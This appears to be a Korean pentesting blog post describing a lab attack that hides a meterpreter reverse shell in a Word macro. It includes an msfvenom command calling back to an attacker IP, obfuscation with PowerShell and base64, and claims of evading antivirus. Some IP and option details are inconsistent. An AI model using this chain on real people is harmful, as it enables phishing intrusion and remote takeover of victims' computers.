본문 바로가기

Research/Pentesting

[Pentesting] Windows exploit with Word Macro

Windows Exploit with Word Macro


1. Exploit Info

Using Microsoft Word File to exploit Victim's computer. Inserting malicious vb codes into word macro. then when victim opens that file, the codes will be run reverse-shell


2. Target Information

- Victim :

IP Address : 192.168.56.132

Mail : mail.naver.com

OS : Windows 10 pro x86-64 kor

MS Word ver : word 2016 professional plus

AV : yes ( with virustotal.com )


- Attacker :

IP Address : 192.168.56.129

OS : Kali Linux v2016.01 x86-64


3. Exploit

This time, we will use macro function to execute malicious code ( reverse shell code ).

So, we are enough to exploit any targets who have MS Office which supports 'macro'


1. First, we need to make our own reverse shell payload with 'msfvenom'

[ Options : msfvenom -p windows/meterpreter/reverse_tcp 192.168.0.35 4444 --platform windows --smallest StagerURILength=5 StagerVerifySSLCert=false -e x86/shikata_ga_nai -a x86 -f c ]

In Short, we make a reverse shell payload encoded with skikata_ga_nai ( poly xor encrypt )


2. Second, Using custom script which makes power shell code. That codes include above payload encoded with 'base64'.


And macro.txt data just like below..

Just put macro.txt data into any .doc files' macro

Then, when victim just opens that .doc file, that codes will be executed automatically


3. Before we attack with this file, lets check this file with AVs and mail virus detector.

There are no problems with AVs


4. If Codes executed normally, we can get victim's shell! like below



- End of PoC -

 

4. Analyze

making reverse shell payload to power shell code

Reference : https://github.com/trustedsec/unicorn